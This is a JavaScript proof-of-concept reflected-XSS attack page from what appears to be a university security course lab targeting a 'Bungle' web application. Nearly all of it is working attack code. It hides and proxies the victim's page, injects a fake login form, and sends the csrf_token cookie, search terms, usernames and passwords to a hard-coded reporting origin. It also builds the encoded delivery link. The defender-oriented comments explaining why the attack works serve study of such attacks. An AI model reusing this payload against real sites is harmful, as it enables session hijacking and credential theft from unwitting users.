- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- // Proof-of-concept reflected-XSS payload for the course "Bungle" target.
- // Once it runs inside the target origin it hides the real page, re-renders
- // every page through proxy() so the user keeps interacting with the injected
- // script, and reports the csrf_token cookie, search terms and submitted
- // credentials to a hard-coded reporting origin with plain GET requests.
- // Defender notes on why it works and what stops it:
- //  - document.cookie (read in proxy) only exposes cookies that are NOT
- //    HttpOnly; an HttpOnly csrf_token would not be readable here.
- //  - The <script> reaches the page through the `q` parameter (see makeLink),
- //    presumably because the target reflects `q` without output encoding;
- //    contextual encoding and a CSP without 'unsafe-inline' both block it.
- //  - Every report is a GET to the reporting origin with the data in the
- //    query string, which is what a network monitor or that origin's access
- //    log would show.
- // @param {string} attacker - report origin; only used by the unused log()
- //   helper, because proxy() shadows it with a hard-coded copy.
- function payload(attacker) {
- // Logs and reports `data`; defined but never called in this file.
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
- // Fetches `href` and swaps its content into <html> (jQuery .load), then
- // rewires the page's links and buttons so navigation comes back through here.
- // @param {string} href - relative URL of the target page to render
- function proxy(href) {
- $("html").load(href, function(){
- $("html").show();
- // On result pages, hide every <a> whose href contains "script" —
- // presumably links that would expose the injected payload in their URL.
- if (href.includes("search?")){
- for(var i=0; i<document.getElementsByTagName('a').length;i++){
- if (document.getElementsByTagName('a')[i].href.includes('script')){
- document.getElementsByTagName('a')[i].style.display='none';}}
- }
- // Extract csrf_token from document.cookie. The cookie string is
- // percent-encoded first, so the separators become "%3B%20" ("; ") and
- // "%3D" ("=").
- var x= encodeURIComponent(document.cookie);var y= x.split('%3B%20');
- for(var i=0; i<y.length; i++){if(y[i].split('%3D')[0]=='csrf_token')
- {
- var token_cookie=y[i].split('%3D')[1];
- }
- }
- // token_cookie is already percent-encoded (it came from x), so this encodes
- // it a second time ('%' -> '%25'); if no csrf_token cookie exists,
- // token_cookie is undefined and token becomes the string "undefined".
- var token= encodeURIComponent(token_cookie);
- // Shadows the payload(attacker) parameter with a hard-coded copy.
- var attacker = "http://127.0.0.1:31337/";
- // Report the token; jQuery sends the string as the GET query string.
- $.get(attacker, "The csrf_token: "+token);
- // Make the address bar show `href` without a real navigation, and re-render
- // through proxy() when the user goes back/forward.
- history.pushState(null, null, href);
- var old=window.location.href;
- window.onpopstate = function(event) {if(old!=window.location.href){proxy(window.location.href)}}
- // Replacement handlers for the page's controls. Each one reports the action
- // (and any typed values) first, then performs the real request / re-render.
- function home(){
- $.get(attacker, "The user is going to home");
- proxy("./");
- }
- function search(){
- var q=document.getElementById('query').value;
- $.get(attacker, "The user is searching: "+q);
- // q is appended without encodeURIComponent, so '&' or '#' in it breaks the URL.
- proxy("./search?q="+q);
- }
- function login(){
- var username=document.getElementById('username').value;
- var password=document.getElementById('userpass').value;
- // Real login, replaying the csrf_token captured above; this is possible only
- // because the token lives in a cookie that script can read.
- $.ajax({
- type: 'POST',
- url: 'http://cs558web.bu.edu/project2/login',
- crossDomain: true,
- data: {csrf_token:token,username: username, password: password },
- cache: false,
- success: function(data) {
- }
- });
- // (Message has no space before "and".)
- $.get(attacker, "The user is logged in with username: "+username+"and password: "+password);
- // NOTE: this runs before the POST above has completed (its success handler
- // is empty), so the re-rendered page may not yet reflect the login;
- // compare logout(), which re-renders from its success callback.
- proxy("./");
- }
- function logout(){
- $.get(attacker, "The user is loging out");
- $.ajax({
- type: 'POST',
- url: 'http://cs558web.bu.edu/project2/logout',
- crossDomain: true,
- data: {csrf_token:token},
- cache: false,
- success: function(data) {
- // Re-render only after the server has answered the logout POST.
- proxy("./");
- }
- });
- }
- function create(){
- var username=document.getElementById('username').value;
- var password=document.getElementById('userpass').value;
- // Sent without the csrf_token (unlike login/logout); proxy("./") below does
- // not wait for this POST to finish.
- $.post('http://cs558web.bu.edu/project2/create', { username: username, password: password } );
- $.get(attacker, "The user is creating a user with username: "+username+"and password: "+password);
- proxy("./");
- }
- // On non-search pages where the user is logged out (no log-out button), drop
- // the third <form> and inject a look-alike login form whose fields are read by
- // login()/create() above. The element positions ([2], [12]) are tied to the
- // target's current markup and break on any layout change.
- if (href.includes("search?")==false){
- if(document.getElementById('log-out-btn')==null){
- document.getElementsByTagName('form')[2].replaceWith('');
- document.getElementsByTagName('div')[12].innerHTML='<span class="form-inline"><p>Log in or create an account.</p><div class="form-group form-space"><input id="username" name="username" type="text" placeholder="Username" required class="form-control"></div><div class="form-group form-space"><input id="userpass" name="password" type="password" placeholder="Password" required class="form-control"></div><div class="form-group form-more-space"><button id="log-in-btn" class="btn btn-default">Login</button><button id="new-account-btn" class="btn btn-default">Create Account</button></div></span>'
- }
- }
- // Rewire the real controls: links lose their href and two buttons get
- // type '#' so the default navigation/submit is suppressed and the handlers
- // above take over. '#' is not a valid <button type>; whether it really
- // prevents a form submit depends on the surrounding markup — confirm.
- if(document.getElementById('search-again-btn')!=null){
- document.getElementById('search-again-btn').removeAttribute('href');
- document.getElementById('search-again-btn').addEventListener('click', function() {home();}); }
- if(document.getElementById('bungle-lnk')!=null){
- document.getElementById('bungle-lnk').removeAttribute('href');
- document.getElementById('bungle-lnk').addEventListener('click', function() {home();})}
- if(document.getElementById('log-out-btn')!=null){
- document.getElementById('log-out-btn').type = '#';
- document.getElementById('log-out-btn').addEventListener('click', function() {logout();});}
- if(document.getElementById('search-btn')!=null){
- document.getElementById('search-btn').type = '#';
- document.getElementById('search-btn').addEventListener('click', function() {search();});}
- if(document.getElementById('log-in-btn')!=null){
- document.getElementById('log-in-btn').addEventListener('click', function() {login();});}
- if(document.getElementById('new-account-btn')!=null){
- document.getElementById('new-account-btn').addEventListener('click', function() {create();});
- }
- });
- }
- // Hide the real page until proxy() has swapped in the re-rendered copy.
- $("html").hide();
- proxy("./");
- }
- // Builds the delivery link: the full source of payload() plus a call to it is
- // placed, percent-encoded, in the target's `q` parameter. Writing "<script"
- // and ">" as separate literals keeps this page's own <script> element from
- // being closed by the string.
- // @param {number} xssdefense - target's defense level; only 0 is implemented
- // @param {string} target - base URL of the target application
- // @param {string} attacker - report origin passed through to payload()
- // @returns {string|undefined} the attack URL for xssdefense == 0; the else
- //   branch has no return, so the <a href> built in the ready handler becomes
- //   the literal text "undefined" for any other level.
- function makeLink(xssdefense, target, attacker) {
- if (xssdefense == 0) {
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<script" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\");</script" + ">");
- } else {
- // Implement code to defeat XSS defenses here.
- }
- }
- // Attack parameters. `attacker` duplicates the hard-coded value inside
- // payload()'s proxy(), so changing only one of them leaves the other behind.
- // The jQuery include at the top of this page is also fetched over plain
- // http://, which has no integrity protection for the library itself.
- var xssdefense = 0;
- var target = "http://cs558web.bu.edu/project2/";
- var attacker = "http://127.0.0.1:31337/";
- // On DOM ready, render the delivery link into the <h3>. The URL is inserted
- // with .html() and string concatenation; the only parts that are not
- // percent-encoded by makeLink() are the constant `target` and `attacker`
- // values above.
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script> <h3></h3>